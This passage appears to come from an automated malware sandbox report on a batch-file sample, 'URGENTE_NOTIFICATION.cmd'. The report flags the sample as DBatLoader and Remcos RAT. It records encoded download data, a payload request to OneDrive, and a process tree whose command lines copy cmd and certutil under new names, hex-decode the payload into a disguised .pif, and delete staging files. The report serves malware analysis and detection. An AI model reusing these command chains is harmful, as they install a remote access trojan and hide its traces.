X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Android-Cert, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 1118344 Last-Modified: Tue, 23 Apr 2024 16:44:35 GMT Date: Wed, 24 Apr 2024 06:40:12 GMT Expires: Wed, 24 Apr 2024 06:40:12 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=Dcxqnw== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-04-24 06:40:13 UTC	4748	IN	Data Raw: 53 30 6c 4b 52 6d 46 57 48 42 64 43 59 55 52 6f 49 69 49 58 59 55 52 46 52 69 46 48 53 30 6c 4b 49 69 4a 45 59 55 56 45 56 6c 68 46 52 45 4a 68 4c 7a 6b 37 4f 6a 67 32 4a 6a 6b 34 4e 43 63 35 4c 7a 41 30 4b 44 6b 71 4c 43 51 6b 4c 43 51 36 50 53 67 73 4f 54 51 77 4b 6a 41 77 4d 7a 67 79 4d 43 68 4c 53 55 70 47 59 56 59 63 46 30 4a 68 52 47 67 69 49 68 64 68 52 45 56 47 49 55 64 4c 53 55 6f 69 49 6b 52 68 52 55 52 57 57 45 56 45 51 6d 46 75 50 44 6f 73 50 54 63 36 4f 43 51 6b 4a 30 74 4a 53 6b 5a 68 56 68 77 58 51 6d 46 45 61 43 49 69 46 32 46 45 52 55 59 68 52 30 74 4a 53 69 49 69 52 47 46 46 52 46 5a 59 52 55 52 43 59 61 71 55 6e 70 57 54 6d 61 6d 55 6b 35 65 61 66 2f 46 58 31 43 41 30 4a 75 38 46 63 7a 71 67 2f 2f 31 66 6f 79 6f 59 41 45 55 4a 47 6d 75 Data Ascii: S0lKRmFWHBdCYURoIiIXYURFRiFHS0lKIiJEYUVEVlhFREJhLzk7Ojg2Jjk4NCc5LzA0KDkqLCQkLCQ6PSgsOTQwKjAwMzgyMChLSUpGYVYcF0JhRGgiIhdhREVGIUdLSUoiIkRhRURWWEVEQmFuPDosPTc6OCQkJ0tJSkZhVhwXQmFEaCIiF2FERUYhR0tJSiIiRGFFRFZYRURCYaqUnpWTmamUk5eaf/FX1CA0Ju8Fczqg//1foyoYAEUJGmu
2024-04-24 06:40:13 UTC	4748	IN	Data Raw: 43 50 72 2f 42 42 41 4c 2b 42 77 43 59 67 77 58 39 4b 55 4d 6f 36 71 55 6e 6f 47 54 6e 32 69 55 56 4b 39 44 70 45 75 44 57 49 4e 52 66 56 42 33 53 4f 64 49 31 56 33 62 55 4f 52 59 77 30 4c 4c 54 4d 35 55 76 55 78 61 53 30 4e 66 4c 56 51 70 52 6a 35 55 4e 30 4e 73 53 78 74 59 53 31 45 53 55 42 42 49 45 45 67 4b 58 52 52 51 48 56 68 71 51 71 4e 4d 6c 76 36 56 42 70 4d 48 66 50 4e 31 2f 70 45 4d 68 50 37 66 44 39 51 48 30 2f 72 54 41 63 30 43 78 77 71 33 43 73 58 31 57 67 4a 44 2b 6a 4d 51 4f 77 5a 41 2f 69 30 47 47 77 64 6b 38 31 6e 2b 56 51 7a 37 2f 76 67 50 43 77 63 63 2b 6d 6f 42 5a 41 4b 76 43 71 38 4c 72 66 53 54 41 33 7a 37 69 78 46 7a 42 34 62 2f 35 51 66 6a 42 75 7a 79 35 66 2f 42 44 62 54 2f 7a 77 37 45 42 6c 4c 37 55 67 41 39 41 7a 63 4c 4a 77 73 Data Ascii: CPr/BBAL+BwCYgwX9KUMo6qUnoGTn2iUVK9DpEuDWINRfVB3SOdI1V3bUORYw0LLTM5UvUxaS0NfLVQpRj5UN0NsSxtYS1ESUBBIEEgKXRRQHVhqQqNMlv6VBpMHfPN1/pEMhP7fD9QH0/rTAc0Cxwq3CsX1WgJD+jMQOwZA/i0GGwdk81n+VQz7/vgPCwcc+moBZAKvCq8LrfSTA3z7ixFzB4b/5QfjBuzy5f/BDbT/zw7EBlL7UgA9AzcLJws
2024-04-24 06:40:13 UTC	457	IN	Data Raw: 6c 42 46 30 39 4c 4c 33 49 67 30 75 42 53 45 47 44 41 41 78 44 78 37 34 66 41 4a 65 44 43 76 30 61 51 79 74 71 70 53 65 58 5a 4f 55 47 70 53 54 6c 30 4e 4d 53 31 72 36 6e 67 48 57 41 39 73 4c 51 77 73 62 38 2f 30 45 47 66 31 57 44 78 55 43 51 2f 32 31 42 51 34 50 34 66 70 37 39 39 51 46 58 2f 63 4d 42 68 73 52 64 76 51 38 39 30 6b 4d 47 67 58 61 42 70 41 42 73 77 34 62 39 71 38 46 4f 41 76 79 6b 36 32 72 53 36 71 5a 48 35 57 54 6d 55 61 6d 41 50 4d 52 45 41 6e 2f 2f 47 33 2f 61 67 59 57 44 6d 6b 4f 6c 76 69 53 42 33 50 2f 35 67 31 69 44 76 6a 33 6e 51 2b 46 44 75 44 36 37 2f 66 42 42 63 72 33 51 67 59 6f 44 69 76 7a 54 66 67 4f 43 2f 34 44 5a 67 53 4a 2b 2b 4d 4d 4a 76 51 71 42 76 59 51 48 2f 6d 44 45 59 45 51 76 2f 79 7a 2b 54 6b 44 55 66 6e 7a 43 41 55 Data Ascii: lBF09LL3Ig0uBSEGDAAxDx74fAJeDCv0aQytqpSeXZOUGpSTl0NMS1r6ngHWA9sLQwsb8/0EGf1WDxUCQ/21BQ4P4fp799QFX/cMBhsRdvQ890kMGgXaBpABsw4b9q8FOAvyk62rS6qZH5WTmUamAPMREAn//G3/agYWDmkOlviSB3P/5g1iDvj3nQ+FDuD67/fBBcr3QgYoDivzTfgOC/4DZgSJ++MMJvQqBvYQH/mDEYEQv/yz+TkDUfnzCAU
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 42 44 64 39 56 72 32 4c 41 31 71 42 57 63 46 46 66 71 76 44 6f 37 32 76 41 51 6a 43 76 58 7a 7a 77 75 30 43 6d 33 2b 42 50 52 38 42 6e 6a 30 6b 51 58 56 44 62 72 34 51 66 4d 32 45 42 77 49 48 77 68 65 2f 2f 71 76 6c 4a 66 48 70 61 2b 62 6c 6c 53 59 42 35 41 47 68 50 4c 4e 2f 31 55 4e 38 2f 38 43 44 68 34 47 61 2f 75 6a 2f 34 73 45 69 41 78 33 44 49 54 7a 78 51 52 4d 2f 46 34 4f 51 41 67 39 41 45 59 49 42 51 6b 69 39 5a 34 42 72 51 74 46 2b 69 34 4c 5a 67 4b 45 2f 2b 50 38 62 51 6f 56 41 67 30 44 32 50 77 78 43 35 33 30 42 77 59 4d 45 42 48 35 6c 67 72 6d 43 30 58 2f 4f 50 4a 71 43 46 50 79 43 77 49 32 43 67 76 34 34 76 4d 37 45 44 6d 6e 72 36 64 42 6f 4b 65 50 6c 46 69 68 51 6f 68 4d 76 56 52 46 54 42 55 48 6b 50 4f 45 2f 75 45 4d 75 50 34 49 44 79 77 48 Data Ascii: BDd9Vr2LA1qBWcFFfqvDo72vAQjCvXzzwu0Cm3+BPR8Bnj0kQXVDbr4QfM2EBwIHwhe//qvlJfHpa+bllSYB5AGhPLN/1UN8/8CDh4Ga/uj/4sEiAx3DITzxQRM/F4OQAg9AEYIBQki9Z4BrQtF+i4LZgKE/+P8bQoVAg0D2PwxC530BwYMEBH5lgrmC0X/OPJqCFPyCwI2Cgv44vM7EDmnr6dBoKePlFihQohMvVRFTBUHkPOE/uEMuP4IDywH
2024-04-24 06:40:13 UTC	65	IN	Data Raw: 39 67 45 64 43 35 62 36 71 67 75 73 41 34 62 2b 63 76 33 6b 42 73 63 4f 74 41 37 4c 2b 56 38 47 50 2f 34 55 44 41 4d 43 39 66 6f 4c 41 76 67 44 6e 50 61 6d 2b 2b 41 52 32 50 76 59 43 75 67 43 73 Data Ascii: 9gEdC5b6qgusA4b+cv3kBscOtA7L+V8GP/4UDAMC9foLAvgDnPam++AR2PvYCugCs
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 2f 2b 31 2f 44 6f 48 4f 51 38 6d 44 7a 50 34 45 67 63 51 2f 36 49 4e 72 77 53 5a 2f 4b 45 45 65 77 58 6f 2b 55 6e 38 51 67 34 43 2f 43 55 4e 61 67 56 48 41 50 37 37 2f 51 6a 30 45 47 55 52 73 50 61 59 43 59 77 42 67 41 74 39 42 64 58 39 77 67 57 2b 42 45 58 34 41 2f 30 78 44 79 50 39 5a 41 78 5a 42 50 67 42 2f 66 72 30 43 57 38 43 69 77 4c 56 2f 65 41 4b 36 76 4c 49 43 4c 30 4f 50 76 59 51 44 6d 55 4f 73 66 71 74 39 36 49 46 66 50 65 52 42 75 67 4f 78 66 50 42 2b 46 30 4c 4e 51 4e 45 41 31 62 38 41 41 73 68 39 49 73 47 63 78 44 74 2b 4e 4d 51 30 68 46 77 2f 57 7a 34 56 41 49 42 2b 41 41 4a 39 42 47 6b 39 59 37 32 66 41 31 32 42 65 6f 46 76 66 72 46 44 54 48 31 63 51 63 58 45 56 76 35 39 52 45 56 45 42 66 38 6e 50 4b 6d 43 48 4c 79 76 67 4f 30 43 37 7a 32 Data Ascii: /+1/DoHOQ8mDzP4EgcQ/6INrwSZ/KEEewXo+Un8Qg4C/CUNagVHAP77/Qj0EGURsPaYCYwBgAt9BdX9wgW+BEX4A/0xDyP9ZAxZBPgB/fr0CW8CiwLV/eAK6vLICL0OPvYQDmUOsfqt96IFfPeRBugOxfPB+F0LNQNEA1b8AAsh9IsGcxDt+NMQ0hFw/Wz4VAIB+AAJ9BGk9Y72fA12BeoFvfrFDTH1cQcXEVv59REVEBf8nPKmCHLyvgO0C7z2
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 68 41 6b 65 39 46 32 69 6c 4b 70 4c 6c 36 65 55 70 56 44 42 53 4c 35 49 4a 2f 55 39 41 6d 6e 36 43 78 44 79 42 67 4c 2f 31 51 6a 76 43 64 44 32 55 66 76 30 43 4f 76 79 47 41 56 30 44 64 6e 34 76 70 53 6c 72 2f 79 6e 72 4a 65 56 6f 4b 4e 51 65 31 6a 6f 51 6b 46 4d 62 76 74 6a 42 4e 30 46 4f 76 6b 31 2f 47 73 4f 62 50 78 68 44 57 51 46 52 77 42 4c 2b 30 55 49 52 78 41 45 45 50 72 33 62 67 73 33 39 61 2b 6c 71 36 76 31 6b 36 36 4c 6f 36 71 55 2b 2f 37 32 2f 67 54 33 39 76 67 48 44 77 2f 30 38 76 6a 35 46 67 75 7a 41 32 49 44 48 76 78 6d 43 78 58 7a 70 77 6d 6a 44 35 4c 33 72 52 41 33 45 4c 44 38 72 66 6d 6c 41 36 54 35 65 77 68 38 45 49 2f 31 67 2f 59 65 44 6f 63 47 63 77 61 4e 41 58 63 4f 68 50 62 6e 42 4f 4d 4b 30 76 49 4c 43 39 73 4b 36 50 37 6c 38 37 30 Data Ascii: hAke9F2ilKpLl6eUpVDBSL5IJ/U9Amn6CxDyBgL/1QjvCdD2Ufv0COvyGAV0Ddn4vpSlr/ynrJeVoKNQe1joQkFMbvtjBN0FOvk1/GsObPxhDWQFRwBL+0UIRxAEEPr3bgs39a+lq6v1k66Lo6qU+/72/gT39vgHDw/08vj5FguzA2IDHvxmCxXzpwmjD5L3rRA3ELD8rfmlA6T5ewh8EI/1g/YeDocGcwaNAXcOhPbnBOMK0vILC9sK6P7l870
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 55 69 30 78 37 53 34 64 66 34 46 54 66 52 74 56 55 36 30 50 71 53 39 74 59 30 56 48 49 55 4d 68 49 74 6b 6a 47 58 62 56 51 53 31 68 67 51 6a 64 4d 4c 31 52 41 54 44 42 4c 4f 31 38 31 56 47 6c 47 61 46 52 5a 51 31 74 4c 55 46 67 50 55 51 74 51 42 6b 6a 30 53 41 68 64 46 46 41 67 57 47 31 43 61 30 79 66 56 4c 45 47 70 51 65 73 38 36 66 2b 66 41 78 37 2f 6e 59 50 6a 77 64 31 2b 6e 4d 42 37 77 4c 6a 43 76 41 4b 37 50 58 59 41 73 48 36 77 78 44 52 42 73 72 2b 73 77 61 79 42 30 37 7a 52 2f 35 46 44 44 44 2b 49 77 38 6a 42 79 58 36 49 77 43 65 41 32 49 4d 56 67 78 56 38 77 30 45 38 2f 7a 79 44 67 41 49 46 67 47 54 43 59 49 49 6a 2f 53 47 41 64 63 4c 35 51 47 79 45 4d 73 49 51 66 2b 6a 2b 35 77 49 69 68 42 36 45 44 54 33 47 67 6e 41 41 63 55 4c 52 67 56 57 39 71 Data Ascii: Ui0x7S4df4FTfRtVU60PqS9tY0VHIUMhItkjGXbVQS1hgQjdML1RATDBLO181VGlGaFRZQ1tLUFgPUQtQBkj0SAhdFFAgWG1Ca0yfVLEGpQes86f+fAx7/nYPjwd1+nMB7wLjCvAK7PXYAsH6wxDRBsr+swayB07zR/5FDDD+Iw8jByX6IwCeA2IMVgxV8w0E8/zyDgAIFgGTCYIIj/SGAdcL5QGyEMsIQf+j+5wIihB6EDT3GgnAAcULRgVW9q
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 49 48 44 50 2f 36 44 57 51 44 47 76 75 6c 42 49 55 46 69 50 6e 67 2f 4e 38 4f 30 2f 7a 76 44 55 63 46 4f 51 41 34 2b 77 38 49 42 42 42 6f 45 61 2f 32 69 71 2b 55 6c 7a 75 6c 73 56 71 57 6b 36 30 44 38 67 49 67 39 68 50 37 6f 51 36 78 2f 4c 45 4e 6f 67 56 33 41 4f 2f 37 36 41 6a 65 45 4e 30 51 75 66 65 2b 43 4d 6b 41 58 77 70 41 42 44 7a 38 4c 51 51 69 42 56 33 35 56 66 7a 36 44 67 33 38 48 67 30 59 42 61 51 41 6f 2f 71 58 43 59 77 52 6a 42 47 45 39 68 55 4a 46 77 47 76 43 4a 6f 4f 64 50 62 62 44 73 4d 50 77 2f 73 76 39 68 41 45 49 76 59 5a 42 72 41 4f 68 76 50 4c 2b 4c 6f 4c 59 41 4d 2b 41 77 58 38 5a 67 75 61 39 4b 41 47 6a 78 44 6a 2b 4d 30 51 58 52 46 43 2f 56 37 34 41 41 49 4d 2b 42 51 49 55 68 44 79 39 57 58 32 71 41 36 4e 42 6e 73 47 31 41 48 53 44 Data Ascii: IHDP/6DWQDGvulBIUFiPng/N8O0/zvDUcFOQA4+w8IBBBoEa/2iq+UlzulsVqWk60D8gIg9hP7oQ6x/LENogV3AO/76AjeEN0Qufe+CMkAXwpABDz8LQQiBV35Vfz6Dg38Hg0YBaQAo/qXCYwRjBGE9hUJFwGvCJoOdPbbDsMPw/sv9hAEIvYZBrAOhvPL+LoLYAM+AwX8Zgua9KAGjxDj+M0QXRFC/V74AAIM+BQIUhDy9WX2qA6NBnsG1AHSD
2024-04-24 06:40:13 UTC	1255	IN	Data Raw: 35 34 51 34 41 6a 4c 43 45 44 2f 53 68 44 37 2b 4b 53 6c 71 36 70 71 6b 36 7a 72 6f 36 71 55 58 37 46 55 65 6b 61 46 56 4e 31 44 38 51 64 73 2b 71 77 41 6b 41 4f 4a 43 39 6f 4c 4f 66 52 55 42 55 6a 39 4f 67 38 6f 43 57 34 42 57 67 6b 53 43 41 2f 30 42 77 45 67 45 4a 4c 36 72 77 76 68 41 39 6e 2b 5a 66 7a 59 42 38 34 50 7a 67 39 51 39 39 6f 49 2b 67 44 36 43 6d 4d 46 32 76 33 41 42 53 55 45 58 50 76 72 39 73 6f 45 5a 50 5a 54 42 77 38 4f 68 66 4e 7a 2b 42 45 4c 42 77 4d 68 41 35 37 37 6f 51 78 35 39 48 59 47 64 52 43 4a 2b 4f 51 51 34 42 48 6e 2f 63 44 34 79 51 4a 70 2b 43 41 49 6a 42 44 73 39 64 76 32 7a 41 30 33 42 53 59 46 4e 76 6f 4f 44 57 48 31 71 51 53 67 43 6f 76 79 64 51 70 34 43 7a 6a 2f 61 2f 4a 64 43 50 2f 79 38 67 4d 50 43 2f 37 32 62 2f 56 6e Data Ascii: 54Q4AjLCED/ShD7+KSlq6pqk6zro6qUX7FUekaFVN1D8Qds+qwAkAOJC9oLOfRUBUj9Og8oCW4BWgkSCA/0BwEgEJL6rwvhA9n+ZfzYB84Pzg9Q99oI+gD6CmMF2v3ABSUEXPvr9soEZPZTBw8OhfNz+BELBwMhA577oQx59HYGdRCJ+OQQ4BHn/cD4yQJp+CAIjBDs9dv2zA03BSYFNvoODWH1qQSgCovydQp4Czj/a/JdCP/y8gMPC/72b/Vn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49739	13.107.139.11	443	3664	C:\Users\Public\Libraries\sppsvc.pif

Timestamp	Bytes transferred	Direction	Data
2024-04-24 06:40:15 UTC	213	OUT	GET /download?resid=BAF30C9243AC3050%21114&authkey=!ACfGQrCE2jZmaGY HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
2024-04-24 06:40:15 UTC	1177	IN	HTTP/1.1 302 Found Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html Expires: -1 Location: https://sf0kkw.by.files.1drv.com/y4mJD7T-efm99Mj7M3bDWK61C5J_9E0cWaFQ8_Sv_xuuCr4GLOJRyaqXhymO2SZPGokQN83FYCJ_NGXm99J3YQUeKk9JGAbhvGp_2o2-ZqiPpZlHfyh0vDDJPwzED9g3MBQOY_JRUb73ibe1qfwZTFHNKw561TwlVHNIQd74BgCS7aipQhr6ymzAsPYfYC9M56Hyw4HUdl0fkn4ScUSuOWbGA/255_Mywiztwuaad?download&psid=1 Set-Cookie: E=P:EuVGZilk3Ig=:XcbdjdlzvEJQ82CvycA6ZyHrrxvlG7XwxEbbWhAeaoA=:F; domain=.live.com; path=/ Set-Cookie: xid=333cd549-450c-4fd1-bcaa-46681dad5c08&&ODSP-ODWEB-ODCF&152; domain=.live.com; path=/ Set-Cookie: xidseq=1; domain=.live.com; path=/ Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Apr-2024 05:00:15 GMT; path=/ Set-Cookie: wla42=; domain=live.com; expires=Wed, 01-May-2024 06:40:15 GMT; path=/ X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 X-MSNServer: 58656754b6-kwdlj X-ODWebServer: namsouthce155880-odwebpl X-Cache: CONFIG_NOCACHE X-MSEdge-Ref: Ref A: 03A90115D829426BA674422D6F991617 Ref B: BY3EDGE0117 Ref C: 2024-04-24T06:40:15Z Date: Wed, 24 Apr 2024 06:40:15 GMT Connection: close Content-Length: 0

Target ID:	0
Start time:	08:40:00
Start date:	24/04/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "
Imagebase:	0x7ff6dbca0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:40:00
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:40:00
Start date:	24/04/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
Imagebase:	0x7ff6991b0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:40:01
Start date:	24/04/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff683f70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:40:01
Start date:	24/04/2024
Path:	C:\Windows\System32\extrac32.exe
Wow64 process (32bit):	false
Commandline:	extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Imagebase:	0x7ff6991b0000
File size:	35'328 bytes
MD5 hash:	41330D97BF17D07CD4308264F3032547
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	08:40:01
Start date:	24/04/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Imagebase:	0x7ff683f70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	08:40:01
Start date:	24/04/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\URGENTE_NOTIFICATION.cmd" "C:\\Users\\Public\\sppsvc.rtf" 9
Imagebase:	0x7ff665880000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs Detection: 0%, Virustotal, Browse
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:40:02
Start date:	24/04/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Imagebase:	0x7ff683f70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:40:02
Start date:	24/04/2024
Path:	C:\Users\Public\kn.exe
Wow64 process (32bit):	true
Commandline:	C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
Imagebase:	0xd50000
File size:	1'651'712 bytes
MD5 hash:	F17616EC0522FC5633151F7CAA278CAA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:40:02
Start date:	24/04/2024
Path:	C:\Users\Public\Libraries\sppsvc.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\sppsvc.pif
Imagebase:	0x400000
File size:	1'646'592 bytes
MD5 hash:	38310FB63BAD19820D761C97F325896D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000003.1664121633.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.4117523372.00000000152FB000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.4105700398.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000003.2527196256.000000000076E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	08:40:02
Start date:	24/04/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
Imagebase:	0x7ff683f70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	08:40:03
Start date:	24/04/2024
Path:	C:\Users\Public\alpha.exe
Wow64 process (32bit):	false
Commandline:	C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
Imagebase:	0x7ff683f70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:40:18
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\MywiztwuO.bat" "
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:40:18
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:40:18
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\extrac32.exe
Wow64 process (32bit):	true
Commandline:	C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Mywiztwu.PIF
Imagebase:	0x9d0000
File size:	29'184 bytes
MD5 hash:	9472AAB6390E4F1431BAA912FCFF9707
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:40:18
Start date:	24/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:40:18
